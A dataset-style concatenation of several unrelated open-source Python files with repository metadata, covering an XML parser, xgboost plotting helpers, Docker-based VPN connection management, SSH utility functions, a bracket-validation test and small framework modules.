return TraML(source, retrieve_refs=retrieve_refs, read_schema=read_schema, iterative=iterative,
use_index=use_index, huge_tree=huge_tree)
def iterfind(source, path, **kwargs):
"""Parse `source` and yield info on elements with specified local
name or by specified "XPath".
.. note:: This function is provided for backward compatibility only.
If you do multiple :py:func:`iterfind` calls on one file, you should
create an :py:class:`TraML` object and use its
:py:meth:`!iterfind` method.
Parameters
----------
source : str or file
File name or file-like object.
path : str
Element name or XPath-like expression. Only local names separated
with slashes are accepted. An asterisk (`*`) means any element.
You can specify a single condition in the end, such as:
``"/path/to/element[some_value>1.5]"``
Note: you can do much more powerful filtering using plain Python.
The path can be absolute or "free". Please don't specify
namespaces.
recursive : bool, optional
If :py:const:`False`, subelements will not be processed when
extracting info from elements. Default is :py:const:`True`.
iterative : bool, optional
Specifies whether iterative XML parsing should be used. Iterative
parsing significantly reduces memory usage and may be just a little
slower. When `retrieve_refs` is :py:const:`True`, however, it is
highly recommended to disable iterative parsing if possible.
Default value is :py:const:`True`.
read_schema : bool, optional
If :py:const:`True`, attempt to extract information from the XML schema
mentioned in the mzIdentML header. Otherwise, use default
parameters. Not recommended without Internet connection or
if you don't like to get the related warnings.
Returns
-------
out : iterator
"""
return TraML(source, **kwargs).iterfind(path, **kwargs)
version_info = xml._make_version_info(TraML)
chain = aux.ChainBase._make_chain(TraML)
| 37.483051
| 107
| 0.626159
|
794e5954361d8fce7efee847b5cc89291be9faae
| 8,313
|
py
|
Python
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | 1
|
2020-12-28T06:19:54.000Z
|
2020-12-28T06:19:54.000Z
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | 1
|
2021-09-22T19:06:13.000Z
|
2021-09-22T19:06:13.000Z
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=too-many-locals, too-many-arguments, invalid-name,
# pylint: disable=too-many-branches
# coding: utf-8
"""Plotting Library."""
from io import BytesIO
import numpy as np
from .core import Booster
from .sklearn import XGBModel
def plot_importance(booster, ax=None, height=0.2,
xlim=None, ylim=None, title='Feature importance',
xlabel='F score', ylabel='Features', fmap='',
importance_type='weight', max_num_features=None,
grid=True, show_values=True, **kwargs):
"""Plot importance based on fitted trees.
Parameters
----------
booster : Booster, XGBModel or dict
Booster or XGBModel instance, or dict taken by Booster.get_fscore()
ax : matplotlib Axes, default None
Target axes instance. If None, new figure and axes will be created.
grid : bool, Turn the axes grids on or off. Default is True (On).
importance_type : str, default "weight"
How the importance is calculated: either "weight", "gain", or "cover"
* "weight" is the number of times a feature appears in a tree
* "gain" is the average gain of splits which use the feature
* "cover" is the average coverage of splits which use the feature
where coverage is defined as the number of samples affected by the split
max_num_features : int, default None
Maximum number of top features displayed on plot. If None, all features will be displayed.
height : float, default 0.2
Bar height, passed to ax.barh()
xlim : tuple, default None
Tuple passed to axes.xlim()
ylim : tuple, default None
Tuple passed to axes.ylim()
title : str, default "Feature importance"
Axes title. To disable, pass None.
xlabel : str, default "F score"
X axis title label. To disable, pass None.
ylabel : str, default "Features"
Y axis title label. To disable, pass None.
fmap: str or os.PathLike (optional)
The name of feature map file.
show_values : bool, default True
Show values on plot. To disable, pass False.
kwargs :
Other keywords passed to ax.barh()
Returns
-------
ax : matplotlib Axes
"""
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError('You must install matplotlib to plot importance')
if isinstance(booster, XGBModel):
importance = booster.get_booster().get_score(
importance_type=importance_type, fmap=fmap)
elif isinstance(booster, Booster):
importance = booster.get_score(importance_type=importance_type, fmap=fmap)
elif isinstance(booster, dict):
importance = booster
else:
raise ValueError('tree must be Booster, XGBModel or dict instance')
if not importance:
raise ValueError(
'Booster.get_score() results in empty. ' +
'This maybe caused by having all trees as decision dumps.')
tuples = [(k, importance[k]) for k in importance]
if max_num_features is not None:
# pylint: disable=invalid-unary-operand-type
tuples = sorted(tuples, key=lambda x: x[1])[-max_num_features:]
else:
tuples = sorted(tuples, key=lambda x: x[1])
labels, values = zip(*tuples)
if ax is None:
_, ax = plt.subplots(1, 1)
ylocs = np.arange(len(values))
ax.barh(ylocs, values, align='center', height=height, **kwargs)
if show_values is True:
for x, y in zip(values, ylocs):
ax.text(x + 1, y, x, va='center')
ax.set_yticks(ylocs)
ax.set_yticklabels(labels)
if xlim is not None:
if not isinstance(xlim, tuple) or len(xlim) != 2:
raise ValueError('xlim must be a tuple of 2 elements')
else:
xlim = (0, max(values) * 1.1)
ax.set_xlim(xlim)
if ylim is not None:
if not isinstance(ylim, tuple) or len(ylim) != 2:
raise ValueError('ylim must be a tuple of 2 elements')
else:
ylim = (-1, len(values))
ax.set_ylim(ylim)
if title is not None:
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def to_graphviz(booster, fmap='', num_trees=0, rankdir=None,
yes_color=None, no_color=None,
condition_node_params=None, leaf_node_params=None, **kwargs):
"""Convert specified tree to graphviz instance. IPython can automatically plot
the returned graphiz instance. Otherwise, you should call .render() method
of the returned graphiz instance.
Parameters
----------
booster : Booster, XGBModel
Booster or XGBModel instance
fmap: str (optional)
The name of feature map file
num_trees : int, default 0
Specify the ordinal number of target tree
rankdir : str, default "UT"
Passed to graphiz via graph_attr
yes_color : str, default '#0000FF'
Edge color when meets the node condition.
no_color : str, default '#FF0000'
Edge color when doesn't meet the node condition.
condition_node_params : dict, optional
Condition node configuration for for graphviz. Example:
.. code-block:: python
{'shape': 'box',
'style': 'filled,rounded',
'fillcolor': '#78bceb'}
leaf_node_params : dict, optional
Leaf node configuration for graphviz. Example:
.. code-block:: python
{'shape': 'box',
'style': 'filled',
'fillcolor': '#e48038'}
\\*\\*kwargs: dict, optional
Other keywords passed to graphviz graph_attr, e.g. ``graph [ {key} = {value} ]``
Returns
-------
graph: graphviz.Source
"""
try:
from graphviz import Source
except ImportError:
raise ImportError('You must install graphviz to plot tree')
if isinstance(booster, XGBModel):
booster = booster.get_booster()
# squash everything back into kwargs again for compatibility
parameters = 'dot'
extra = {}
for key, value in kwargs.items():
extra[key] = value
if rankdir is not None:
kwargs['graph_attrs'] = {}
kwargs['graph_attrs']['rankdir'] = rankdir
for key, value in extra.items():
if 'graph_attrs' in kwargs.keys():
kwargs['graph_attrs'][key] = value
else:
kwargs['graph_attrs'] = {}
del kwargs[key]
if yes_color is not None or no_color is not None:
kwargs['edge'] = {}
if yes_color is not None:
kwargs['edge']['yes_color'] = yes_color
if no_color is not None:
kwargs['edge']['no_color'] = no_color
if condition_node_params is not None:
kwargs['condition_node_params'] = condition_node_params
if leaf_node_params is not None:
kwargs['leaf_node_params'] = leaf_node_params
if kwargs:
parameters += ':'
parameters += str(kwargs)
tree = booster.get_dump(
fmap=fmap,
dump_format=parameters)[num_trees]
g = Source(tree)
return g
def plot_tree(booster, fmap='', num_trees=0, rankdir=None, ax=None, **kwargs):
"""Plot specified tree.
Parameters
----------
booster : Booster, XGBModel
Booster or XGBModel instance
fmap: str (optional)
The name of feature map file
num_trees : int, default 0
Specify the ordinal number of target tree
rankdir : str, default "TB"
Passed to graphiz via graph_attr
ax : matplotlib Axes, default None
Target axes instance. If None, new figure and axes will be created.
kwargs :
Other keywords passed to to_graphviz
Returns
-------
ax : matplotlib Axes
"""
try:
from matplotlib import pyplot as plt
from matplotlib import image
except ImportError:
raise ImportError('You must install matplotlib to plot tree')
if ax is None:
_, ax = plt.subplots(1, 1)
g = to_graphviz(booster, fmap=fmap, num_trees=num_trees, rankdir=rankdir,
**kwargs)
s = BytesIO()
s.write(g.pipe(format='png'))
s.seek(0)
img = image.imread(s)
ax.imshow(img)
ax.axis('off')
return ax
| 32.346304
| 98
| 0.624564
|
794e599b74bf3be17803e580b283e14439c9f1b4
| 14,302
|
py
|
Python
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | 1
|
2021-02-11T16:08:05.000Z
|
2021-02-11T16:08:05.000Z
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | 1
|
2021-05-04T00:20:28.000Z
|
2021-07-07T16:21:35.000Z
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | null | null | null |
import json
import os
import shutil
import asyncio
import aiohttp
import aiodocker
import zipfile
import re
import logging
from datetime import datetime
from .exceptions import ConnectionError, ApiError, SpecificationError
from aiodocker.exceptions import DockerError
VPN_IMAGE = "trainml/tinc:no-upnp"
STORAGE_IMAGE = "trainml/local-storage"
STATUSES = dict(
UNKNOWN="unknown",
NEW="new",
CONNECTING="connecting",
CONNECTED="connected",
NOT_CONNECTED="not connected",
STOPPED="stopped",
REMOVED="removed",
)
class Connections(object):
def __init__(self, trainml):
self.trainml = trainml
CONFIG_DIR = os.path.expanduser(
os.environ.get("TRAINML_CONFIG_DIR") or "~/.trainml"
)
self.dir = f"{CONFIG_DIR}/connections"
os.makedirs(
self.dir,
exist_ok=True,
)
async def list(self):
con_dirs = os.listdir(self.dir)
connections = []
con_tasks = []
for con_dir in con_dirs:
try:
con_type, con_id = con_dir.split("_")
except ValueError:
# unintelligible directory
continue
connection = Connection(self.trainml, con_type, con_id)
connections.append(connection)
con_task = asyncio.create_task(connection.check())
con_tasks.append(con_task)
await asyncio.gather(*con_tasks)
return connections
async def cleanup(self):
con_dirs = os.listdir(self.dir)
await asyncio.gather(
asyncio.create_task(
_cleanup_containers(self.dir, con_dirs, "vpn")
),
asyncio.create_task(
_cleanup_containers(self.dir, con_dirs, "storage")
),
)
async def remove_all(self):
shutil.rmtree(self.dir)
os.makedirs(
self.dir,
exist_ok=True,
)
await self.cleanup()
class Connection:
def __init__(self, trainml, entity_type, id, entity=None, **kwargs):
self.trainml = trainml
self._id = id
self._type = entity_type
self._status = STATUSES.get("UNKNOWN")
self._entity = entity
CONFIG_DIR = os.path.expanduser(
os.environ.get("TRAINML_CONFIG_DIR") or "~/.trainml"
)
CONNECTIONS_DIR = f"{CONFIG_DIR}/connections"
self._dir = f"{CONNECTIONS_DIR}/{entity_type}_{id}"
os.makedirs(
self._dir,
exist_ok=True,
)
@property
def id(self) -> str:
return self._id
@property
def type(self) -> str:
return self._type
@property
def status(self) -> str:
return self._status
def __str__(self):
return f"Connection for {self.type} - {self.id}: {self.status}"
def __repr__(self):
return f"Connection( trainml , {self.id}, {self.type})"
async def _get_entity(self):
if self.type == "dataset":
self._entity = await self.trainml.datasets.get(self.id)
elif self.type == "job":
self._entity = await self.trainml.jobs.get(self.id)
elif self.type == "model":
self._entity = await self.trainml.models.get(self.id)
else:
raise TypeError(
"Connection type must be in: ['dataset', 'model', 'job']"
)
async def _download_connection_details(self):
zip_file = f"{self._dir}/details.zip"
url = await self._entity.get_connection_utility_url()
async with aiohttp.ClientSession() as session:
async with session.request("GET", url) as resp:
with open(
zip_file,
"wb",
) as fd:
content = await resp.read()
fd.write(content)
with zipfile.ZipFile(zip_file, "r") as zipf:
for info in zipf.infolist():
extracted_path = zipf.extract(info, self._dir)
if info.create_system == 3 and os.path.isfile(
extracted_path
): ## 3 - ZIP_UNIX_SYSTEM
unix_attributes = info.external_attr >> 16
if unix_attributes:
os.chmod(extracted_path, unix_attributes)
os.remove(zip_file)
async def _test_connection(self, container):
entity_details = self._entity.get_connection_details()
if not entity_details:
return False
net = _parse_cidr(entity_details.get("cidr"))
target_ip = f"{net.get('first_octet')}.{net.get('second_octet')}.{net.get('third_octet')}.254"
logging.debug("")
ping = await container.exec(
["ping", "-c", "1", target_ip],
stdout=True,
stderr=True,
)
stream = ping.start()
await stream.read_out()
data = await ping.inspect()
while data["ExitCode"] is None:
await stream.read_out()
data = await ping.inspect()
await stream.close()
if data["ExitCode"] == 0:
return True
return False
async def check(self):
if not self._entity:
try:
await self._get_entity()
except ApiError as e:
if e.status == 404:
self._status = STATUSES.get("REMOVED")
self._status = STATUSES.get("REMOVED")
shutil.rmtree(self._dir)
else:
raise e
if not os.path.isdir(f"{self._dir}/data"):
self._status = STATUSES.get("NEW")
return
try:
with open(f"{self._dir}/vpn_id", "r") as f:
vpn_id = f.read()
except OSError as e:
self._status = STATUSES.get("STOPPED")
return
docker = aiodocker.Docker()
try:
container = await docker.containers.get(vpn_id)
except DockerError as e:
if e.status == 404:
self._status = STATUSES.get("STOPPED")
await docker.close()
return
raise e
data = await container.show()
if not data["State"]["Running"]:
self._status = STATUSES.get("STOPPED")
await container.delete()
os.remove(f"{self._dir}/vpn_id")
try:
with open(f"{self._dir}/storage_id", "r") as f:
storage_id = f.read()
try:
storage_container = await docker.containers.get(storage_id)
await storage_container.delete(force=True)
except DockerError as e:
if e.status != 404:
raise e
except OSError as e:
pass
await docker.close()
return
connected = await self._test_connection(container)
await docker.close()
if connected:
self._status = STATUSES.get("CONNECTED")
else:
self._status = STATUSES.get("NOT_CONNECTED")
async def start(self):
logging.debug(f"Beginning start {self.type} connection {self.id}")
if self.status == STATUSES.get("UNKNOWN"):
await self.check()
if self.status in [
STATUSES.get("CONNECTING"),
STATUSES.get("CONNECTED"),
STATUSES.get("NOT_CONNECTED"),
]:
raise SpecificationError(
"status", "Only inactive connections can be started."
)
self._status = STATUSES.get("CONNECTING")
logging.info(f"Connecting...")
if not self._entity:
await self._get_entity()
if not os.path.isdir(f"{self._dir}/data"):
await self._download_connection_details()
docker = aiodocker.Docker()
await asyncio.gather(
docker.pull(VPN_IMAGE), docker.pull(STORAGE_IMAGE)
)
entity_details = self._entity.get_connection_details()
if (
entity_details.get("model_path")
or entity_details.get("input_path")
or entity_details.get("output_path")
):
logging.debug(f"Starting storage container")
storage_container = await docker.containers.run(
_get_storage_container_config(
self.id,
entity_details.get("cidr"),
f"{self._dir}/data",
entity_details.get("ssh_port"),
model_path=entity_details.get("model_path"),
input_path=entity_details.get("input_path"),
output_path=entity_details.get("output_path"),
)
)
logging.debug(
f"Storage container started, id: {storage_container.id}"
)
with open(f"{self._dir}/storage_id", "w") as f:
f.write(storage_container.id)
logging.debug(f"Starting VPN container")
vpn_container = await docker.containers.run(
_get_vpn_container_config(
self.id, entity_details.get("cidr"), f"{self._dir}/data"
)
)
logging.debug(f"VPN container started, id: {vpn_container.id}")
with open(f"{self._dir}/vpn_id", "w") as f:
f.write(vpn_container.id)
count = 0
while count <= 30:
logging.debug(f"Test connectivity attempt {count+1}")
res = await self._test_connection(vpn_container)
if res:
logging.debug(f"Test connectivity successful {count+1}")
break
count += 1
await docker.close()
if count > 30:
self._status = STATUSES.get("NOT_CONNECTED")
raise ConnectionError(f"Unable to connect {self.type} {self.id}")
self._status = STATUSES.get("CONNECTED")
logging.info(f"Connection Successful.")
logging.debug(f"Completed start {self.type} connection {self.id}")
async def stop(self):
logging.debug(f"Beginning stop {self.type} connection {self.id}")
if not self._entity:
await self._get_entity()
docker = aiodocker.Docker()
tasks = []
logging.info("Disconnecting...")
try:
with open(f"{self._dir}/vpn_id", "r") as f:
vpn_id = f.read()
logging.debug(f"vpn container id: {vpn_id}")
vpn_container = await docker.containers.get(vpn_id)
vpn_delete_task = asyncio.create_task(
vpn_container.delete(force=True)
)
tasks.append(vpn_delete_task)
os.remove(f"{self._dir}/vpn_id")
except OSError:
logging.debug("vpn container not found")
storage_delete_task = None
try:
with open(f"{self._dir}/storage_id", "r") as f:
storage_id = f.read()
logging.debug(f"storage container id: {vpn_id}")
storage_container = await docker.containers.get(storage_id)
storage_delete_task = asyncio.create_task(
storage_container.delete(force=True)
)
tasks.append(storage_delete_task)
os.remove(f"{self._dir}/storage_id")
except OSError:
logging.debug("storage container not found")
await asyncio.gather(*tasks)
await docker.close()
self._status = STATUSES.get("REMOVED")
shutil.rmtree(self._dir)
logging.info("Disconnected.")
logging.debug(f"Completed stop {self.type} connection {self.id}")
async def _cleanup_containers(path, con_dirs, type):
containers_target = []
for con_dir in con_dirs:
try:
with open(f"{path}/{con_dir}/{type}_id", "r") as f:
id = f.read()
containers_target.append(id)
except OSError:
continue
docker = aiodocker.Docker()
containers = await docker.containers.list(
all=True,
filters=json.dumps(dict(label=["service=trainml", f"type={type}"])),
)
tasks = [
asyncio.create_task(container.delete(force=True))
for container in containers
if container.id not in containers_target
]
await asyncio.gather(*tasks)
await docker.close()
def _parse_cidr(cidr):
res = re.match(
r"(?P<first_octet>[0-9]{1,3})\.(?P<second_octet>[0-9]{1,3})\.(?P<third_octet>[0-9]{1,3})\.(?P<fourth_octet>[0-9]{1,3})/(?P<mask_length>[0-9]{1,2})",
cidr,
)
net = res.groupdict()
return net
def _get_vpn_container_config(id, cidr, data_dir):
config = dict(
Image=VPN_IMAGE,
Hostname=id,
Cmd=[],
AttachStdin=False,
AttachStdout=False,
AttachStderr=False,
Tty=False,
Env=[
f"NETWORK={id}",
"DEBUG=1",
],
HostConfig=dict(
Init=True,
Binds=[f"{data_dir}:/etc/tinc:rw"],
NetworkMode="host",
CapAdd=["NET_ADMIN"],
),
Labels=dict(type="vpn", service="trainml", id=id),
)
return config
def _get_storage_container_config(
id,
cidr,
data_dir,
ssh_port,
model_path=None,
input_path=None,
output_path=None,
):
Binds = [f"{data_dir}/.ssh:/opt/ssh"]
if model_path:
Binds.append(f"{os.path.expanduser(model_path)}:/opt/model:ro")
if input_path:
Binds.append(f"{os.path.expanduser(input_path)}:/opt/data:ro")
if output_path:
Binds.append(f"{os.path.expanduser(output_path)}:/opt/output:rw")
config = dict(
Image=STORAGE_IMAGE,
Hostname=id,
Cmd=[],
AttachStdin=False,
AttachStdout=False,
AttachStderr=False,
Tty=False,
Env=[
f"VPN_CIDR={cidr}",
],
ExposedPorts={f"22/tcp": {}},
HostConfig=dict(
Init=True,
Binds=Binds,
PortBindings={
f"22/tcp": [dict(HostPort=f"{ssh_port}", HostIP="0.0.0.0")],
},
),
Labels=dict(type="storage", service="trainml", id=id),
)
return config
| 32.357466
| 156
| 0.550482
|
794e59abab1d60ef28544cb699deaef53af8f3c4
| 794
|
py
|
Python
|
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | null | null | null |
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | null | null | null |
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | 1
|
2021-08-29T20:16:19.000Z
|
2021-08-29T20:16:19.000Z
|
import pytest
from challenges.multi_bracket_validation.multi_bracket_validation import *
def test_valid_data():
actual1=multi_bracket_validation('(){}')
actual2=multi_bracket_validation('()[[Extra Characters]]')
actual3=multi_bracket_validation('({()}')
actual4=multi_bracket_validation('({()})')
excepted=True
assert actual1==excepted
assert actual2==excepted
assert actual3==excepted
assert actual4==excepted
def test_valid_data():
actual1=multi_bracket_validation('({()}')
actual2=multi_bracket_validation('({())')
actual3=multi_bracket_validation('({())))')
actual4=multi_bracket_validation('({()]')
excepted=False
assert actual1==excepted
assert actual2==excepted
assert actual3==excepted
assert actual4==excepted
| 30.538462
| 74
| 0.720403
|
794e5a26a1e643dfb7d64f37e50a012b1af926e3
| 3,103
|
py
|
Python
|
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | null | null | null |
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | 1
|
2019-06-05T09:35:09.000Z
|
2020-07-02T09:46:46.000Z
|
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
from x2py.event_sink import EventSink
from x2py.util.trace import Trace
class Case(EventSink):
"""Represents a set of application logic."""
def __init__(self):
super(Case, self).__init__()
def setup_with(self, flow):
"""Initializes this case with the specified holding flow."""
self.flow = flow
from x2py.flow import Flow
backup = Flow.thread_local.current
Flow.thread_local.current = flow
self._setup()
Flow.thread_local.current = backup
def teardown_with(self, flow):
"""Cleans up this case with the specified holding flow."""
from x2py.flow import Flow
backup = Flow.thread_local.current
Flow.thread_local.current = flow
self._teardown()
Flow.thread_local.current = backup
self.cleanup() # eventsink cleanup
def setup(self):
"""Overridden by subclasses to build a initialization chain."""
pass
def teardown(self):
"""Overridden by subclasses to build a cleanup chain."""
pass
def on_start(self):
"""Overridden by subclasses to build a flow startup handler chain."""
pass
def on_stop(self):
"""Overridden by subclasses to build a flow shutdown handler chain."""
pass
def _setup(self):
"""Called internally when this case is initialized."""
self.setup()
def _teardown(self):
"""Called internally when this case is cleaned up."""
self.teardown()
class CaseStack(object):
"""Handles a group of cases."""
def __init__(self):
self.cases = []
self.activated = False
def add(self, case):
if case is None or not isinstance(case, Case):
raise TypeError()
if case in self.cases:
return False
self.cases.append(case)
return True
def remove(self, case):
if case is None or not isinstance(case, Case):
raise TypeError()
if case not in self.cases:
return False
self.cases.remove(case)
return True
def setup_with(self, flow):
if self.activated:
return
self.activated = True
for case in self.cases:
Trace.trace("casestack: setting up case {}", type(case).__name__)
case.setup_with(flow)
def teardown_with(self, flow):
if not self.activated:
return
self.activated = False
for case in reversed(self.cases):
try:
Trace.trace("casestack: tearing down case {}", type(case).__name__)
case.teardown_with(flow)
except BaseException as ex:
Trace.error("{} {} teardown: {}", flow.name, type(case).__name__, ex)
def on_start(self):
for case in self.cases:
case.on_start()
def on_stop(self):
for case in reversed(self.cases):
try:
case.on_stop()
except:
pass
| 27.460177
| 85
| 0.588141
|
794e5dccdc42a5d639222239fa58a7d4cebe11a3
| 5,829
|
py
|
Python
|
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | 5
|
2021-02-18T17:46:39.000Z
|
2021-12-29T15:48:07.000Z
|
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | null | null | null |
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | 2
|
2021-03-19T14:06:20.000Z
|
2021-09-26T14:08:34.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# imports.
from ssht00ls.classes.config import *
import os, sys, requests, ast, json, pathlib, glob, string, getpass, django
# save config file safely.
def save_config_safely(backup=True, __loader__=None, __keyboard_interrupt__=None):
if backup: save_config_backup_safely()
try:
CONFIG.save()
except KeyboardInterrupt as e:
if __loader__ == None:
__loader__ = dev0s.console.Loader("&RED&Do not interrupt!&END& Saving ssht00ls config file.")
return save_config_safely(backup=False, __loader__=__loader__, __keyboard_interrupt__=e)
if __loader__ != None: __loader__.stop()
if __keyboard_interrupt__ != None:
raise KeyboardInterrupt(__keyboard_interrupt__)
# save backup of config file safely.
def save_config_backup_safely(__loader__=None):
path = DATABASE.join(".backups")
if not Files.exists(path): Files.create(path, directory=True)
path += "/config/"
if not Files.exists(path): Files.create(path, directory=True)
path += f"/{Date().date}"
try:
Files.save(path, CONFIG.dictionary, format="json")
except KeyboardInterrupt as e:
if __loader__ == None:
__loader__ = dev0s.console.Loader("&RED&Do not interrupt!&END& Saving backup of ssht00ls config file.")
return save_config_backup_safely(__loader__=__loader__)
if __loader__ != None: __loader__.stop()
fp = FilePath(gfp.base(path))
if fp.size(format=int, mode="mb") >= 5:
fp.delete(forced=True)
fp.create(directory=True)
# check / start the ssh agent (due to circular import keep it over here for classes: [aliases]).
def ssh_agent():
"""
SSH_AUTH_SOCK = os.environ.get("SSH_AUTH_SOCK")
SSH_AGENT_PID = os.environ.get("SSH_AGENT_PID")
"""
"""
try:
output = utils.__execute__([f"ssh-add", "-D"])
except: a=1
try:
output = utils.__execute__([f"ssh-add", "-k"])
except: a=1
"""
# version 2.
if len(dev0s.code.processes(includes="ssh-agent").processes) >= 10:
dev0s.code.execute(f"pkill -9 -f ssh-agent")
try:
output = dev0s.code.execute(f"ssh-agent")
if not output.success: output.crash()
output = str(output)
try:
SSH_AUTH_SOCK = output.split("SSH_AUTH_SOCK=")[1].split(";")[0]
os.environ["SSH_AUTH_SOCK"] = SSH_AUTH_SOCK
except: return None
try:
SSH_AGENT_PID = output.split("SSH_AGENT_PID=")[1].split(";")[0]
os.environ["SSH_AGENT_PID"] = SSH_AGENT_PID
except: return None
except: return None
os.environ["SSH_AUTH_SOCK"] = SSH_AUTH_SOCK
os.environ["SSH_AGENT_PID"] = SSH_AGENT_PID
# converting variables.
def __array_to_string__(array, joiner=" "):
string = ""
for i in array:
if string == "": string = str(i)
else: string += joiner+str(i)
return string
def __string_to_boolean__(string):
if string in ["true", "True", True]: return True
elif string in ["false", "False", False]: return False
else: raise ValueError(f"Could not convert string [{string}] to a boolean.")
def __string_to_bash__(string):
a = string.replace('(','\(').replace(')','\)').replace("'","\'").replace(" ","\ ").replace("$","\$").replace("!","\!").replace("?","\?").replace("@","\@").replace("$","\$").replace("%","\%").replace("^","\^").replace("&","\&").replace("*","\*").replace("'","\'").replace('"','\"')
return a
# generation.
def __generate_pincode__(characters=6, charset=string.digits):
return ''.join(random.choice(charset) for x in range(characters))
#
# execute a shell command.
def __execute__(
# the command in array.
command=[],
# wait till the command is pinished.
wait=False,
# the commands timeout, [timeout] overwrites parameter [wait].
timeout=None,
# the commands output return format: string / array.
return_format="string",
# the subprocess.Popen.shell argument.
shell=False,
# pass a input string to the process.
input=None,
):
def __convert__(byte_array, return_format=return_format):
if return_format == "string":
lines = ""
for line in byte_array:
lines += line.decode()
return lines
elif return_format == "array":
lines = []
for line in byte_array:
lines.append(line.decode().replace("\n","").replace("\\n",""))
return lines
# create process.
if isinstance(command, str): command = command.split(' ')
p = subprocess.Popen(
command,
shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,)
# send input.
if input != None:
if isinstance(input, list):
for s in input:
p.stdin.write(f'{s}\n'.encode())
elif isinstance(input, str):
p.stdin.write(f'{input}\n'.encode())
else: raise ValueError("Invalid format for parameter [input] required format: [string, array].")
p.stdin.flush()
# timeout.
if timeout != None:
time.sleep(timeout)
p.terminate()
# await.
elif wait:
p.wait()
# get output.
output = __convert__(p.stdout.readlines(), return_format=return_format)
if return_format == "string" and output == "":
output = __convert__(p.stderr.readlines(), return_format=return_format)
elif return_format == "array" and output == []:
output = __convert__(p.stderr.readlines(), return_format=return_format)
return output
# execute a shell script.
def __execute_script__(
# the script in string.
script="",
# wait till the command is pinished.
wait=False,
# the commands timeout, [timeout] overwrites parameter [wait].
timeout=None,
# the commands output return format: string / array.
return_format="string",
# the subprocess.Popen.shell argument.
shell=False,
# pass a input string to the process.
input=None,
):
path = f"/tmp/shell_script.{__generate_pincode__(characters=32)}.sh"
with open(str(path), "w") as file:
file.write(str(script))
os.system(f"chmod +x {path}")
output = __execute__(
command=[f"sh", f"{path}"],
wait=wait,
timeout=timeout,
return_format=return_format,
shell=shell,
input=input,)
os.system(f"rm -fr {path}")
return output
| 31.508108
| 288
| 0.692057
|
794e5e4e5f63fb77cd2afadace84e70c79fadffd
| 1,066
|
py
|
Python
|
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
from Coach import Coach
# from othello.pytorch.NNet import NNetWrapper as nn
# from othello.OthelloGame import OthelloGame as Game
# from othello.tensorflow.NNet import NNetWrapper as nn
from binpack.tensorflow.NNet import NNetWrapper as nn
from binpack.BinPackGame import BinPackGame as Game
from utils import *
args = dotdict({
'numIters': 8,
'numEps': 3,
'tempThreshold': 15,
'updateThreshold': 0.6,
'maxlenOfQueue': 200000,
'numMCTSSims': 50,
'arenaCompare': 2,
'cpuct': 1,
'checkpoint': './temp/',
'load_model': False,
'load_folder_file': ('/dev/models/8x100x50','best.pth.tar'),
'numItersForTrainExamplesHistory': 40,
})
if __name__=="__main__":
N_TILES = 8
HEIGHT = 8
WIDTH = 8
g = Game(HEIGHT, WIDTH, N_TILES)
nnet = nn(g)
if args.load_model and False:
nnet.load_checkpoint(args.load_folder_file[0], args.load_folder_file[1])
c = Coach(g, nnet, args)
if args.load_model:
print("Load trainExamples from file")
c.loadTrainExamples()
c.learn()
| 24.790698
| 80
| 0.669794
|
794e5f29c4d556af23e1605ce304a0faa801858f
| 889
|
py
|
Python
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 990
|
2018-06-05T11:49:22.000Z
|
2022-03-31T08:59:17.000Z
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 1
|
2021-11-01T01:29:38.000Z
|
